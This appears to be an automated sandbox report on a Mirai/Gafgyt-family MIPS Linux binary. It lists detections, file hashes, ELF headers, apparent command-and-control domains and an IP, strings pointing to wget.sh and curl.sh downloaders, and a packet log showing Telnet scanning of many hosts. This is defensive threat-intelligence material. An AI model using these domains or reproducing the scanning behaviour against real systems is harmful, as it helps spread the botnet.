                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611370 Sample: mips.elf Startdate: 10/02/2025 Architecture: LINUX Score: 84 25 thekittler.ru. [malformed] 2->25 27 polizei.su. [malformed] 2->27 29 56 other IPs or domains 2->29 33 Antivirus / Scanner detection for submitted sample 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected Mirai 2->37 39 Connects to many ports of the same IP (likely port scanning) 2->39 8 mips.elf 2->8         started        10 xfce4-session xfdesktop 2->10         started        12 xfce4-session xfce4-panel 2->12         started        14 10 other processes 2->14 signatures3 41 Sends malformed DNS queries 27->41 process4 process5 16 mips.elf 8->16         started        process6 18 mips.elf 16->18         started        21 mips.elf 16->21         started        23 mips.elf 16->23         started        signatures7 31 Sample tries to kill multiple processes (SIGKILL) 18->31
                SourceDetectionScannerLabelLink
                mips.elf42%ReversingLabsLinux.Backdoor.Gafgyt
                mips.elf46%VirustotalBrowse
                mips.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches

                Download Network PCAP: filteredfull

                NameIPActiveMaliciousAntivirus DetectionReputation
                cat-are-here.ru
                185.93.89.106
                truefalse
                  high
                  cuttiecats.ru
                  185.93.89.106
                  truefalse
                    high
                    mykittler.ru
                    185.93.89.106
                    truefalse
                      high
                      cats-master.ru
                      185.93.89.106
                      truefalse
                        high
                        kittlerer.ru
                        185.93.89.106
                        truefalse
                          high
                          gokittler.ru
                          185.93.89.106
                          truefalse
                            high
                            qittler.ru. [malformed]
                            unknown
                            unknownfalse
                              high
                              gokittler.ru. [malformed]
                              unknown
                              unknowntrue
                                unknown
                                kittler.ru. [malformed]
                                unknown
                                unknowntrue
                                  unknown
                                  cats-master.ru. [malformed]
                                  unknown
                                  unknowntrue
                                    unknown
                                    thekittler.ru. [malformed]
                                    unknown
                                    unknowntrue
                                      unknown
                                      newkittler.ru. [malformed]
                                      unknown
                                      unknowntrue
                                        unknown
                                        mykittler.ru. [malformed]
                                        unknown
                                        unknowntrue
                                          unknown
                                          polizei.su. [malformed]
                                          unknown
                                          unknowntrue
                                            unknown
                                            kittlez.ru. [malformed]
                                            unknown
                                            unknownfalse
                                              high
                                              kittlerer.ru. [malformed]
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http:///wget.shmips.elffalse
                                                  high
                                                  http:///curl.shmips.elffalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    1.186.178.181
                                                    unknownIndia
                                                    45769DVOIS-IND-VoisBroadbandPvtLtdINfalse
                                                    209.123.240.12
                                                    unknownUnited States
                                                    8001NET-ACCESS-CORPUSfalse
                                                    123.36.135.99
                                                    unknownKorea Republic of
                                                    6619SAMSUNGSDS-AS-KRSamsungSDSIncKRfalse
                                                    188.35.191.195
                                                    unknownRussian Federation
                                                    34123NETORN-ASRUfalse
                                                    78.140.32.79
                                                    unknownRussian Federation
                                                    34573OBERON-ASNRUfalse
                                                    63.190.64.54
                                                    unknownUnited States
                                                    1239SPRINTLINKUSfalse
                                                    25.116.95.17
                                                    unknownUnited Kingdom
                                                    7922COMCAST-7922USfalse
                                                    211.140.50.110
                                                    unknownChina
                                                    56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
                                                    133.215.189.21
                                                    unknownJapan2497IIJInternetInitiativeJapanIncJPfalse
                                                    213.248.159.188
                                                    unknownTurkey
                                                    8386KOCNETTRfalse
                                                    52.94.168.245
                                                    unknownUnited States
                                                    16509AMAZON-02USfalse
                                                    108.58.16.54
                                                    unknownUnited States
                                                    6128CABLE-NET-1USfalse
                                                    34.163.125.203
                                                    unknownUnited States
                                                    2686ATGS-MMD-ASUSfalse
                                                    175.208.67.239
                                                    unknownKorea Republic of
                                                    4766KIXS-AS-KRKoreaTelecomKRfalse
                                                    160.181.150.86
                                                    unknownSouth Africa
                                                    137951CLAYERLIMITED-AS-APClayerLimitedHKfalse
                                                    146.247.117.190
                                                    unknownAustria
                                                    57037MKQ-ASDEfalse
                                                    198.2.243.223
                                                    unknownUnited States
                                                    54600PEGTECHINCUSfalse
                                                    192.35.75.23
                                                    unknownUnited States
                                                    29484RUB-ASDEfalse
                                                    181.69.121.168
                                                    unknownColombia
                                                    27831ColombiaMovilCOfalse
                                                    91.189.91.43
                                                    unknownUnited Kingdom
                                                    41231CANONICAL-ASGBfalse
                                                    91.189.91.42
                                                    unknownUnited Kingdom
                                                    41231CANONICAL-ASGBfalse
                                                    75.184.195.174
                                                    unknownUnited States
                                                    10796TWC-10796-MIDWESTUSfalse
                                                    163.224.220.195
                                                    unknownJapan17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                                                    185.93.89.106
                                                    cat-are-here.ruUnited Kingdom
                                                    200861TS-EMEA-ASNGBfalse
                                                    175.202.252.137
                                                    unknownKorea Republic of
                                                    4766KIXS-AS-KRKoreaTelecomKRfalse
                                                    83.43.155.209
                                                    unknownSpain
                                                    3352TELEFONICA_DE_ESPANAESfalse
                                                    109.202.202.202
                                                    unknownSwitzerland
                                                    13030INIT7CHfalse
                                                    161.122.26.73
                                                    unknownKorea Republic of
                                                    17866KISTNET-AS-KRKoreaInstituteofScienceandTechnologyKRfalse
                                                    211.3.132.140
                                                    unknownJapan4725ODNSoftBankMobileCorpJPfalse
                                                    197.122.2.94
                                                    unknownEgypt
                                                    36992ETISALAT-MISREGfalse
                                                    88.171.2.111
                                                    unknownFrance
                                                    12322PROXADFRfalse
                                                    134.12.253.14
                                                    unknownUnited States
                                                    270AS270USfalse
                                                    41.83.76.194
                                                    unknownSenegal
                                                    8346SONATEL-ASAutonomousSystemEUfalse
                                                    202.10.137.75
                                                    unknownAustralia
                                                    136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUfalse
                                                    167.37.240.222
                                                    unknownCanada
                                                    2665CDAGOVNCAfalse
                                                    163.135.230.101
                                                    unknownJapan4673INTERVIANTTDATACORPORATIONJPfalse
                                                    38.207.138.11
                                                    unknownUnited States
                                                    9009M247GBfalse
                                                    32.79.80.242
                                                    unknownUnited States
                                                    2686ATGS-MMD-ASUSfalse
                                                    28.225.89.160
                                                    unknownUnited States
                                                    7922COMCAST-7922USfalse
                                                    11.152.5.38
                                                    unknownUnited States
                                                    3356LEVEL3USfalse
                                                    63.174.223.29
                                                    unknownUnited States
                                                    1239SPRINTLINKUSfalse
                                                    52.238.108.30
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    50.21.2.183
                                                    unknownUnited States
                                                    17184ATL-CBEYONDUSfalse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    91.189.91.43arm7.elfGet hashmaliciousMiraiBrowse
                                                      dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                        dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              klfarm.elfGet hashmaliciousUnknownBrowse
                                                                kflarm7.elfGet hashmaliciousUnknownBrowse
                                                                  bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                    bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                      .Smpsl.elfGet hashmaliciousUnknownBrowse
                                                                        91.189.91.42arm7.elfGet hashmaliciousMiraiBrowse
                                                                          dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                  klfarm.elfGet hashmaliciousUnknownBrowse
                                                                                    kflarm7.elfGet hashmaliciousUnknownBrowse
                                                                                      bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                        bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                          .Smpsl.elfGet hashmaliciousUnknownBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            mykittler.rurep.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 156.229.232.99
                                                                                            cats-master.ruarm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 185.93.89.106
                                                                                            rep.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 156.229.232.99
                                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                                            • 156.229.232.99
                                                                                            cat-are-here.ruarm7.elfGet hashmaliciousMiraiBrowse
                                                                                            • 185.93.89.106
                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                            • 156.229.232.99
                                                                                            cuttiecats.rurep.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                            • 156.229.232.99
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            SAMSUNGSDS-AS-KRSamsungSDSIncKRbotnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 182.197.254.66
                                                                                            arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 122.101.20.211
                                                                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 123.44.15.189
                                                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                            • 211.189.29.131
                                                                                            Hgf.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 182.194.71.95
                                                                                            Hgf.x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 123.36.126.32
                                                                                            Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                            • 123.42.125.135
                                                                                            botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                            • 123.43.36.122
                                                                                            telnet.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 165.213.18.224
                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                            • 123.47.210.148
                                                                                            NET-ACCESS-CORPUShttps://storage.googleapis.com/xscdsxcdsxscd/urusmansory.html#dazdaz.html?od=1syw67963ab90e83d_vl_twentyvl_15s4.20qkq6m.O0000rj86o329yy012_x11504.j86o3MHF6dWJ5LTNhNXVic2Q0x697lGet hashmaliciousPhisherBrowse
                                                                                            • 207.99.58.98
                                                                                            http://storage.googleapis.com/hsdhjfsdf/gooogle.html#/redirect.html?syw=1x1675702edd8221_vl_twenty.j86ld0qzuby-0moccdj.20qkq6m.UagJhDKMHF6dWJ5LTBtb2NjZGo0f2czTGet hashmaliciousPhisherBrowse
                                                                                            • 207.99.58.98
                                                                                            telnet.spc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 67.196.72.110
                                                                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                            • 66.29.82.42
                                                                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 66.29.106.89
                                                                                            87.121.112.22-arm-2025-01-16T06_52_38.elfGet hashmaliciousUnknownBrowse
                                                                                            • 209.123.121.233
                                                                                            5.elfGet hashmaliciousUnknownBrowse
                                                                                            • 67.196.24.200
                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                            • 66.246.149.120
                                                                                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 209.123.28.188
                                                                                            armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                            • 209.123.54.51
                                                                                            DVOIS-IND-VoisBroadbandPvtLtdIN154.213.189.141-mips-2025-01-21T03_19_06.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 1.186.8.76
                                                                                            armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                            • 202.122.17.225
                                                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 1.186.123.160
                                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                            • 114.79.185.100
                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                            • 1.186.123.112
                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 202.122.17.232
                                                                                            S4kCacU4pQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 202.122.17.222
                                                                                            Tw6PiXhrrV.elfGet hashmaliciousUnknownBrowse
                                                                                            • 114.79.137.214
                                                                                            sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 1.186.123.165
                                                                                            YrwQEQwAlQ.elfGet hashmaliciousMiraiBrowse
                                                                                            • 202.122.17.246
                                                                                            No context
                                                                                            No context
                                                                                            No created / dropped files found
                                                                                            File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                                            Entropy (8bit):5.672518079029429
                                                                                            TrID:
                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                            File name:mips.elf
                                                                                            File size:121'692 bytes
                                                                                            MD5:3c8a517caf2e285e584747f21b3c90e3
                                                                                            SHA1:7e795c9512d298a5f497f6a946a5a0b04ff3ffd4
                                                                                            SHA256:0c4618c5f0a988c3f0205aab766a9b48d71d649e3c1a49042b1df90b949a5a5b
                                                                                            SHA512:622c9055cc18c9cee685c6d56b92c30343b6b113763bb7c9b4c124f91cca251a20421887da93408b8fa42e67655bc0fa3c10fd2525808b729bcb73b1994956b7
                                                                                            SSDEEP:3072:EC/mb45PSvD5LVkThqiQwQFJmUE1PDz1tnm3Vwte/slxqIauY6J3Z029qTul27WL:Emmb4AjjDIuIy3NQ
                                                                                            TLSH:BBC3961A2E3C4F5DF77A857AC7F389218B6476421AE1CB4DD26CFD025A7030D241B7AA
                                                                                            File Content Preview:.ELF.....................@.`...4...,.....4. ...(.............@...@...........................E...E........:.........dt.Q............................<...'.S....!'.......................<...'.Sh...!... ....'9... ......................<...'.S8...!........'9.

                                                                                            ELF header

                                                                                            Class:ELF32
                                                                                            Data:2's complement, big endian
                                                                                            Version:1 (current)
                                                                                            Machine:MIPS R3000
                                                                                            Version Number:0x1
                                                                                            Type:EXEC (Executable file)
                                                                                            OS/ABI:UNIX - System V
                                                                                            ABI Version:0
                                                                                            Entry Point Address:0x400260
                                                                                            Flags:0x1007
                                                                                            ELF Header Size:52
                                                                                            Program Header Offset:52
                                                                                            Program Header Size:32
                                                                                            Number of Program Headers:3
                                                                                            Section Header Offset:121132
                                                                                            Section Header Size:40
                                                                                            Number of Section Headers:14
                                                                                            Header String Table Index:13
                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                            NULL0x00x00x00x00x0000
                                                                                            .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                                            .textPROGBITS0x4001200x1200x195800x00x6AX0016
                                                                                            .finiPROGBITS0x4196a00x196a00x5c0x00x6AX004
                                                                                            .rodataPROGBITS0x4197000x197000x30800x00x2A0016
                                                                                            .ctorsPROGBITS0x45d0000x1d0000x80x00x3WA004
                                                                                            .dtorsPROGBITS0x45d0080x1d0080x80x00x3WA004
                                                                                            .data.rel.roPROGBITS0x45d0140x1d0140xe00x00x3WA004
                                                                                            .dataPROGBITS0x45d1000x1d1000x3300x00x3WA0016
                                                                                            .gotPROGBITS0x45d4300x1d4300x4980x40x10000003WAp0016
                                                                                            .sbssNOBITS0x45d8c80x1d8c80x240x00x10000003WAp004
                                                                                            .bssNOBITS0x45d8f00x1d8c80x31c80x00x3WA0016
                                                                                            .mdebug.abi32PROGBITS0x9ea0x1d8c80x00x00x0001
                                                                                            .shstrtabSTRTAB0x00x1d8c80x640x00x0001
                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                            LOAD0x00x4000000x4000000x1c7800x1c7805.76090x5R E0x10000.init .text .fini .rodata
                                                                                            LOAD0x1d0000x45d0000x45d0000x8c80x3ab83.65980x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                                            Download Network PCAP: filteredfull

                                                                                            • Total Packets: 343
                                                                                            • 38241 undefined
                                                                                            • 443 (HTTPS)
                                                                                            • 80 (HTTP)
                                                                                            • 53 (DNS)
                                                                                            • 23 (Telnet)
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 10, 2025 20:19:04.647418976 CET43928443192.168.2.2391.189.91.42
                                                                                            Feb 10, 2025 20:19:06.030673027 CET5604823192.168.2.23192.35.75.23
                                                                                            Feb 10, 2025 20:19:06.035502911 CET2356048192.35.75.23192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.035654068 CET5604823192.168.2.23192.35.75.23
                                                                                            Feb 10, 2025 20:19:06.036427975 CET4957623192.168.2.23188.35.191.195
                                                                                            Feb 10, 2025 20:19:06.039309978 CET3431023192.168.2.2325.116.95.17
                                                                                            Feb 10, 2025 20:19:06.041223049 CET2349576188.35.191.195192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.041270971 CET4957623192.168.2.23188.35.191.195
                                                                                            Feb 10, 2025 20:19:06.042927980 CET4943623192.168.2.23211.140.50.110
                                                                                            Feb 10, 2025 20:19:06.044101000 CET233431025.116.95.17192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.044183016 CET3431023192.168.2.2325.116.95.17
                                                                                            Feb 10, 2025 20:19:06.045957088 CET4368023192.168.2.2341.83.76.194
                                                                                            Feb 10, 2025 20:19:06.047702074 CET2349436211.140.50.110192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.047825098 CET4943623192.168.2.23211.140.50.110
                                                                                            Feb 10, 2025 20:19:06.049808025 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.050741911 CET234368041.83.76.194192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.050811052 CET4368023192.168.2.2341.83.76.194
                                                                                            Feb 10, 2025 20:19:06.051585913 CET5520423192.168.2.23163.224.220.195
                                                                                            Feb 10, 2025 20:19:06.054600954 CET4020223192.168.2.23175.202.252.137
                                                                                            Feb 10, 2025 20:19:06.054610968 CET3824139702185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.054686069 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.056380033 CET2355204163.224.220.195192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.056443930 CET5520423192.168.2.23163.224.220.195
                                                                                            Feb 10, 2025 20:19:06.059132099 CET4338623192.168.2.2375.184.195.174
                                                                                            Feb 10, 2025 20:19:06.059423923 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.059449911 CET2340202175.202.252.137192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.059537888 CET4020223192.168.2.23175.202.252.137
                                                                                            Feb 10, 2025 20:19:06.062211037 CET3712623192.168.2.23108.58.16.54
                                                                                            Feb 10, 2025 20:19:06.063900948 CET234338675.184.195.174192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.064229012 CET3824139702185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.064230919 CET4338623192.168.2.2375.184.195.174
                                                                                            Feb 10, 2025 20:19:06.064296007 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.065754890 CET4235223192.168.2.23197.122.2.94
                                                                                            Feb 10, 2025 20:19:06.067074060 CET2337126108.58.16.54192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.067147970 CET3712623192.168.2.23108.58.16.54
                                                                                            Feb 10, 2025 20:19:06.068775892 CET3710423192.168.2.23163.135.230.101
                                                                                            Feb 10, 2025 20:19:06.069039106 CET3824139702185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.070580006 CET2342352197.122.2.94192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.070712090 CET4235223192.168.2.23197.122.2.94
                                                                                            Feb 10, 2025 20:19:06.073584080 CET2337104163.135.230.101192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.073734045 CET3710423192.168.2.23163.135.230.101
                                                                                            Feb 10, 2025 20:19:06.074599981 CET5322223192.168.2.23181.69.121.168
                                                                                            Feb 10, 2025 20:19:06.077147961 CET3386423192.168.2.2363.190.64.54
                                                                                            Feb 10, 2025 20:19:06.079371929 CET2353222181.69.121.168192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.079421997 CET5322223192.168.2.23181.69.121.168
                                                                                            Feb 10, 2025 20:19:06.080574036 CET4572223192.168.2.2334.163.125.203
                                                                                            Feb 10, 2025 20:19:06.081892014 CET233386463.190.64.54192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.081974030 CET3386423192.168.2.2363.190.64.54
                                                                                            Feb 10, 2025 20:19:06.083734035 CET4968823192.168.2.23134.12.253.14
                                                                                            Feb 10, 2025 20:19:06.085362911 CET234572234.163.125.203192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.085431099 CET4572223192.168.2.2334.163.125.203
                                                                                            Feb 10, 2025 20:19:06.086987019 CET4854023192.168.2.2338.207.138.11
                                                                                            Feb 10, 2025 20:19:06.088562012 CET2349688134.12.253.14192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.088752985 CET4968823192.168.2.23134.12.253.14
                                                                                            Feb 10, 2025 20:19:06.090240955 CET3718423192.168.2.23160.181.150.86
                                                                                            Feb 10, 2025 20:19:06.091764927 CET234854038.207.138.11192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.092314005 CET4854023192.168.2.2338.207.138.11
                                                                                            Feb 10, 2025 20:19:06.095011950 CET2337184160.181.150.86192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.100301027 CET3718423192.168.2.23160.181.150.86
                                                                                            Feb 10, 2025 20:19:06.142833948 CET4377623192.168.2.23209.123.240.12
                                                                                            Feb 10, 2025 20:19:06.147634029 CET2343776209.123.240.12192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.147720098 CET4377623192.168.2.23209.123.240.12
                                                                                            Feb 10, 2025 20:19:06.149333954 CET3334823192.168.2.2388.171.2.111
                                                                                            Feb 10, 2025 20:19:06.154145956 CET233334888.171.2.111192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.154239893 CET3334823192.168.2.2388.171.2.111
                                                                                            Feb 10, 2025 20:19:06.154572964 CET6020823192.168.2.2311.152.5.38
                                                                                            Feb 10, 2025 20:19:06.157834053 CET3799623192.168.2.23175.208.67.239
                                                                                            Feb 10, 2025 20:19:06.159720898 CET236020811.152.5.38192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.159831047 CET6020823192.168.2.2311.152.5.38
                                                                                            Feb 10, 2025 20:19:06.162041903 CET3492823192.168.2.23123.36.135.99
                                                                                            Feb 10, 2025 20:19:06.162648916 CET2337996175.208.67.239192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.162699938 CET3799623192.168.2.23175.208.67.239
                                                                                            Feb 10, 2025 20:19:06.167099953 CET2334928123.36.135.99192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.170519114 CET3492823192.168.2.23123.36.135.99
                                                                                            Feb 10, 2025 20:19:06.242712975 CET4221423192.168.2.2383.43.155.209
                                                                                            Feb 10, 2025 20:19:06.247631073 CET234221483.43.155.209192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.247720957 CET4221423192.168.2.2383.43.155.209
                                                                                            Feb 10, 2025 20:19:06.264246941 CET3657423192.168.2.23167.37.240.222
                                                                                            Feb 10, 2025 20:19:06.269036055 CET2336574167.37.240.222192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.269108057 CET3657423192.168.2.23167.37.240.222
                                                                                            Feb 10, 2025 20:19:06.274498940 CET5325623192.168.2.23161.122.26.73
                                                                                            Feb 10, 2025 20:19:06.279319048 CET2353256161.122.26.73192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.279426098 CET5325623192.168.2.23161.122.26.73
                                                                                            Feb 10, 2025 20:19:06.279429913 CET4266423192.168.2.23146.247.117.190
                                                                                            Feb 10, 2025 20:19:06.284208059 CET2342664146.247.117.190192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.286890030 CET4266423192.168.2.23146.247.117.190
                                                                                            Feb 10, 2025 20:19:06.309957981 CET5047423192.168.2.231.186.178.181
                                                                                            Feb 10, 2025 20:19:06.314908028 CET23504741.186.178.181192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.316860914 CET5047423192.168.2.231.186.178.181
                                                                                            Feb 10, 2025 20:19:06.321647882 CET3463623192.168.2.23133.215.189.21
                                                                                            Feb 10, 2025 20:19:06.326530933 CET2334636133.215.189.21192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.326591015 CET3463623192.168.2.23133.215.189.21
                                                                                            Feb 10, 2025 20:19:06.328609943 CET4369423192.168.2.2332.79.80.242
                                                                                            Feb 10, 2025 20:19:06.333405972 CET234369432.79.80.242192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.334239960 CET4369423192.168.2.2332.79.80.242
                                                                                            Feb 10, 2025 20:19:06.359244108 CET3655623192.168.2.23211.3.132.140
                                                                                            Feb 10, 2025 20:19:06.364067078 CET2336556211.3.132.140192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.364125013 CET3655623192.168.2.23211.3.132.140
                                                                                            Feb 10, 2025 20:19:06.366238117 CET4805423192.168.2.23198.2.243.223
                                                                                            Feb 10, 2025 20:19:06.371018887 CET2348054198.2.243.223192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.374377966 CET4805423192.168.2.23198.2.243.223
                                                                                            Feb 10, 2025 20:19:06.386943102 CET5003223192.168.2.23202.10.137.75
                                                                                            Feb 10, 2025 20:19:06.391725063 CET2350032202.10.137.75192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.391833067 CET5003223192.168.2.23202.10.137.75
                                                                                            Feb 10, 2025 20:19:06.393668890 CET3934623192.168.2.23213.248.159.188
                                                                                            Feb 10, 2025 20:19:06.398458958 CET2339346213.248.159.188192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.398526907 CET3934623192.168.2.23213.248.159.188
                                                                                            Feb 10, 2025 20:19:06.401721001 CET3710423192.168.2.2352.94.168.245
                                                                                            Feb 10, 2025 20:19:06.406510115 CET233710452.94.168.245192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.406573057 CET3710423192.168.2.2352.94.168.245
                                                                                            Feb 10, 2025 20:19:06.409133911 CET3797623192.168.2.2378.140.32.79
                                                                                            Feb 10, 2025 20:19:06.413912058 CET233797678.140.32.79192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.413990021 CET3797623192.168.2.2378.140.32.79
                                                                                            Feb 10, 2025 20:19:06.414948940 CET3467223192.168.2.2363.174.223.29
                                                                                            Feb 10, 2025 20:19:06.419735909 CET233467263.174.223.29192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.419795036 CET3467223192.168.2.2363.174.223.29
                                                                                            Feb 10, 2025 20:19:06.422014952 CET5541623192.168.2.2350.21.2.183
                                                                                            Feb 10, 2025 20:19:06.426763058 CET235541650.21.2.183192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.426820993 CET5541623192.168.2.2350.21.2.183
                                                                                            Feb 10, 2025 20:19:06.427267075 CET5521823192.168.2.2328.225.89.160
                                                                                            Feb 10, 2025 20:19:06.432073116 CET235521828.225.89.160192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.432400942 CET5521823192.168.2.2328.225.89.160
                                                                                            Feb 10, 2025 20:19:06.436126947 CET5864023192.168.2.2352.238.108.30
                                                                                            Feb 10, 2025 20:19:06.440918922 CET235864052.238.108.30192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.441003084 CET5864023192.168.2.2352.238.108.30
                                                                                            Feb 10, 2025 20:19:06.681700945 CET3824139702185.93.89.106192.168.2.23
                                                                                            Feb 10, 2025 20:19:06.681776047 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.681968927 CET3970238241192.168.2.23185.93.89.106
                                                                                            Feb 10, 2025 20:19:06.726537943 CET5864023192.168.2.2352.238.108.30
                                                                                            Feb 10, 2025 20:19:06.726572990 CET3467223192.168.2.2363.174.223.29
                                                                                            Feb 10, 2025 20:19:06.726608992 CET3934623192.168.2.23213.248.159.188
                                                                                            Feb 10, 2025 20:19:06.726623058 CET5521823192.168.2.2328.225.89.160
                                                                                            Feb 10, 2025 20:19:06.726623058 CET5541623192.168.2.2350.21.2.183
                                                                                            Feb 10, 2025 20:19:06.726623058 CET3797623192.168.2.2378.140.32.79
                                                                                            Feb 10, 2025 20:19:06.726623058 CET3710423192.168.2.2352.94.168.245
                                                                                            Feb 10, 2025 20:19:06.726629972 CET4805423192.168.2.23198.2.243.223
                                                                                            Feb 10, 2025 20:19:06.726629972 CET3655623192.168.2.23211.3.132.140
                                                                                            Feb 10, 2025 20:19:06.726630926 CET5003223192.168.2.23202.10.137.75
                                                                                            Feb 10, 2025 20:19:06.726644039 CET3463623192.168.2.23133.215.189.21
                                                                                            Feb 10, 2025 20:19:06.726663113 CET4369423192.168.2.2332.79.80.242
                                                                                            Feb 10, 2025 20:19:06.726686001 CET5325623192.168.2.23161.122.26.73
                                                                                            Feb 10, 2025 20:19:06.726686001 CET5047423192.168.2.231.186.178.181
                                                                                            Feb 10, 2025 20:19:06.726686001 CET4266423192.168.2.23146.247.117.190
                                                                                            Feb 10, 2025 20:19:06.726739883 CET3799623192.168.2.23175.208.67.239
                                                                                            Feb 10, 2025 20:19:06.726742029 CET3492823192.168.2.23123.36.135.99
